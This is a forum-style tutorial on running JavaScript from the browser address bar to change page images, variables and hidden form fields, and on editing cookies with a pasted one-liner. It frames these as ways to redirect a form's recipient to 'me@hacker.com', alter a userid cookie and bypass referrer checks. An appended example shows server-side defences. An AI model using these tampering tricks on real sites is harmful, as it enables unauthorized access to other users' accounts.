Inline Javascript


Using inline JavaScript, a user can alter things on a website without having to leave it or save the page to their PC. This is done from the browser's address bar. The syntax of the commands looks like this:

For displaying the code I have replaced javascript with javascrit, and

CODE :
javascrit:alert(#command#)


For example, if you want to see an alert inside the http://www.example.com site, type the URL in the address bar and, when the page loads, delete the URL and type:

CODE :
javascrit:alert("Hello World")


as the new URL. This way an alert will show up saying 'Hello World'. However, with this technique someone can alter almost everything in a page, for example an image. Let's suppose that there is an image with the site's logo. By viewing the source of the page (this can be done by going to View-Source) we find this piece of HTML code:

CODE :
[IMG Name="hi" SRC="hello.gif"]


So there is an image named "hi" and its source is "hello.gif". We want to change this to "bye.jpeg", which is stored on our site http://www.mysite.com. So the full URL of our image is http://www.mysite.com/bye.jpeg
Using inline JavaScript we type in the address bar:

CODE :
javascrit:alert(document.hi.src="http://www.mysite.com/bye.jpeg")


You will see an alert saying http://www.mysite.com/bye.jpeg and after that the image will be changed. Notice, though, that those changes are temporary! If you refresh the page or enter it again your changes will be lost, because you don't alter the site on the server, only on your PC.

In the same way we can view or change the value of variables. For example, we find this piece of code in the site's source:

CODE :

[SCRIPT LANGUAGE="javascrit"]
var a="test"
[/SCRIPT]


This means that the variable with the name a has the value "test". In order to view the value of the variable we would type:

CODE :
javascrit:alert(a)


And in order to change it from 'test' to 'hello':

CODE :
javascrit:alert(a="hello")


However, inline JavaScript is mostly used for changing a form's attributes. This is the piece of code we have:

CODE :

[form name="format" action="send.php" method="post"]
[input type="hidden" name="mail" value="someone@somewhere.com"]
[input type="text" name="name"]
[input type="submit" value="submit"][/form]


We want the form to be sent to our mailbox and not to someone@somewhere.com
This can be done by this command:

CODE :
javascrit:alert(document.format.mail.value="me@hacker.com")


As you have noticed by now we always use a hierarchy in the items we edit:
We start from the bigger to the smaller:

1) We started with document

2) We typed the name of the object we wanted to alter (for example document.hi.src) or the item in which it belonged and then the name of it (for example document.format.mail.value)

3) Lastly we ended in the attribute of the item we wanted to change (for example its source: document.hi.src, or its value: document.format.mail.value)

4) We separated the words using dots (.)

5) When we wanted to change an attribute we used the equal sign (=) and the new attribute.

*NOTE: We use "" when the new attribute is a character string (for example: document.format.mail.value="me@hacker.com").
If we wanted it to be the value of a variable, we wouldn't use the "". For example, to change the variable a's value to the value of variable b, we would type javascrit:alert(a=b)

However most items in a page have no name. For example:

CODE :

[form action="send.php" method="post"]
[input type="hidden" name="mail" value="someone@somewhere.com"]
[input type="text" name="name"]
[input type="submit" value="submit"][/form]


In this code the form's name is missing. Using all the above, the command would look like this:

CODE :
javascrit:alert(document. .mail.value="me@hacker.com")


In this case we will have to count all the forms to find out the form's number. I will use an example:

CODE :

[form action="send.php" method="post"]
[input type="text" name="name"]
[input type="submit" value="submit"]
[/form]

[form action="send.php" method="post"]
[input type="hidden" name="mail" value="someone@somewhere.com"]
[input type="text" name="name"]
[input type="submit" value="submit"]
[/form]

[form action="send.php" method="post"]
[input type="text" name="name"]
[input type="submit" value="submit"]
[/form]


In this code we see 3 forms, but the one we are interested in is the second. So the number of the form we want is 2.
We must not forget that we start counting from number 1: we say 1, 2, 3, 4... However, in JavaScript the counting starts from number 0: it goes 0, 1, 2, 3, etc.

So the actual number of the form is 1, not 2. In general, find the number of the form and subtract one (number-1).
We will use this number to fill in the gap in our command:

CODE :
javascrit:alert(document.forms[1].mail.value="me@hacker.com")


Like this you can change images or links that have no name. To do that just change "forms" to the type of item you want to change:

For Images it would be:

CODE :
javascrit:alert(document.images[3].src="#the url of the picture you want#")


For links it would be:

CODE :
javascrit:alert(document.links[0].href="#the url you want#")


Lastly, we can use this technique to edit cookies.
The command is the following and was written by Dr_aMado from triviasecurity.net, but I altered it a bit so that it shows the cookie before the user edits it.

Just copy-paste this line to the address bar:

CODE :

javascrit:alert(window.c=function a(n,v,nv){c=document.cookie;c=c.substring(c.indexOf(n)+n.length,c.length);c=c.substring(1,((c.indexOf(";")>-1) ? c.indexOf(";") : c.length));nc=unescape(c).replace(v,nv);document.cookie=n+"="+escape(nc);return unescape(document.cookie);});alert('The cookie is: "'+document.cookie+'"');alert(c(prompt("The name of the cookie:",""),prompt("Change this value:",""),prompt("with this:","")));


** Added by Kane:
If you would like to edit your cookies manually, then this command will do that for you.

CODE :
javascrit:alert(document.cookie)


That will show you your current cookie. Say for example, that is 'userid=1'. You want to change that to 'userid=2'. You would use the following command:

CODE :
javascrit:alert(document.cookie="userid=2")


In conclusion, I must stress that the changes are made only on the user's side! It's like saving the site on your PC and then modifying it. However, using this technique you can trick a page (for example with cookies) or bypass the referrer check of a page.

For example, some pages check where the user sends the data from. Specifically, if the data from http://www.test.com/form.php was sent to http://www.test.com/check.php, check.php would possibly check whether the data was sent from the form in http://www.test.com/form.php
Apart from that, if you manage to enter your own JavaScript code in a page, using something like this technique you will be able to alter pictures and stuff like that permanently!
However, you need further knowledge than the one which is provided here.
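
As an added example (not part of the original post), this is how a server can make the hidden-field and cookie edits described above ineffective: the recipient address is kept on the server instead of in the `mail` field, and the `userid` cookie is signed with an HMAC so an edited value is rejected. The names `SECRET`, `FORM_RECIPIENTS`, `signCookie`, `verifyCookie` and `resolveRecipient` are assumptions made for this example.

```javascript
// Added example, not from the original post. All names are constructed.
const crypto = require("crypto");

// Server-only key (constructed demo value; load a real one from config).
const SECRET = "demo-secret-not-for-production";

// The recipient is stored on the server, keyed by a form id, so there is
// no hidden "mail" field for the client to rewrite.
const FORM_RECIPIENTS = new Map([["contact", "someone@somewhere.com"]]);

function mac(value) {
  return crypto.createHmac("sha256", SECRET).update(value).digest("hex");
}

// Issue the cookie value as "<value>.<hmac>" instead of a bare "userid=1".
function signCookie(value) {
  return value + "." + mac(value);
}

// Return the original value, or null if the cookie was edited or unsigned.
function verifyCookie(cookie) {
  const dot = cookie.lastIndexOf(".");
  if (dot < 1) return null;
  const value = cookie.slice(0, dot);
  const given = Buffer.from(cookie.slice(dot + 1), "utf8");
  const expected = Buffer.from(mac(value), "utf8");
  // timingSafeEqual throws on unequal lengths, so check the length first.
  if (given.length !== expected.length) return null;
  return crypto.timingSafeEqual(given, expected) ? value : null;
}

// Whatever "mail" value arrives in the posted body is ignored.
function resolveRecipient(formId, postedBody) {
  return FORM_RECIPIENTS.get(formId) || null;
}

// Constructed demo: the edits from the article, seen from the server.
const issued = signCookie("1");
console.log(verifyCookie(issued));                  // "1"
console.log(verifyCookie("2" + issued.slice(1)));   // null
console.log(resolveRecipient("contact", { mail: "me@hacker.com" }));
```

The signature only proves the cookie value was issued by the server; what that user id is allowed to do must still be checked on the server.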
